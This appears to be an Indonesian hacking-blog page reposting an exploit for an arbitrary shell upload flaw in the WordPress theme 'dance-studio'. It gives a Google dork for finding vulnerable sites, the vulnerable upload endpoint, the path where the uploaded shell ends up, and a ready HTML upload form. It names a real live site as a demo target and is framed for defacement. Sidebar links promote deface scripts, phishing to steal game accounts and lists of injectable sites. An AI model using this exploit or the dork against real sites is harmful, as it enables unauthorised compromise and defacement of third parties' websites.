Deface dengan Wordpress Themes dance-studio - Arbitrary Shell Upload

Deface dengan Wordpress Themes dance-studio - Arbitrary Shell Upload


##################################################################################
# Exploit Title : Wordpress Themes dance-studio - Arbitrary Shell Upload vulnerbility
# Author : xBADGIRL21
# Google Dork: inurl:/wp-content/themes/dance-studio
# Date: 12-11-2017
# Vendor Homepage: http://themes.cmsmasters.net/?theme=dance-studio by looplava
# Version: 1.0.0
# Tested on: Win 7
# MyBlog : http://xbadgirl21.blogspot.com/
# Video Proof : https://youtu.be/unEP_-WWMy8
#################################################################################
# [*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
#################################################################################

# [!] Exploit : http://127.0.0.1/wordpress/wp-content/themes/dance-studio/core/libs/imperavi/tests/file_upload.php

# [!] Shell Path : http://127.0.0.1//wp-content/uploads/

#################################################################################
# [*] CoDe: 
#################################################################################
<html> 
<body> 
<form 
action="http://127.0.0.1/wordpress/wp-content/themes/dance-studio/core/libs/imperavi/tests/file_upload.php"
method="POST" enctype="multipart/form-data"> 
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form> 
</body> 
</html>
#################################################################################
# [*] Live Demo: 
#################################################################################
# https://abbyleedancecompany.com
#################################################################################
# [*] ABOUT: 
#################################################################################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#################################################################################

★★★★

  • Script Deface Keren 2023 dengan Lagu
    Script Deface Keren 2023 dengan Lagu Pada postingan sebelumnya kami telah membuat artikel kumpulan script deface terbaru kamu bisa melihatnya disini Dan pada kesempatan kali ini kami ingin berb ...
  • Bypass Admin WebositeZ [Noredirect]
    Bypass Admin WebositeZ [Noredirect] Oke langsung Ke Tutorial gans... Download dulu addons Noredirect di Mozilla. Pilih salah satu Web Dorknya :  1. "Design By WebositeZ" 2. "Powere ...
  • Cara Hack Akun PES Mobile dengan Phising (Script)
    Cara Hack Akun PES Mobile dengan Phising (Script)Magelang1337.com - Bagi kamu yang memiliki kegemaran bermain sepakbola dengan dari Game pasti sudah tak lagi asing dengan Pro Evolution Soccer (PES). Game sepa ...
  • Kumpulan Website SQL inject 2018 FRESH #2
    Kumpulan Website SQL inject 2018 FRESH #2 Sebab terjadinya SQL Injection 1. Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabka ...

Silahkan Komentar dengan bahasa yang sopan :)

  1. Untuk membuat judul komentar, gunakan <i rel="h2">Judul Komentar</i>
  2. Untuk membuat kotak catatan, <i rel="quote">catatan</i>
  3. Untuk membuat teks stabilo, <i rel="mark">mark</i>
  4. Untuk membuat teks mono, <i rel="kbd">kbd</i>
  5. Untuk membuat kode singkat, <i rel="code">shorcode</i>
  6. Untuk membuat kode panjang, <i rel="pre"><i rel="code">potongan kode</i></i>
  7. Untuk membuat teks tebal, <strong>tebal</strong> atau <b>tebal</b>
  8. Untuk membuat teks miring, <em>miring</em> atau <i>miring</i>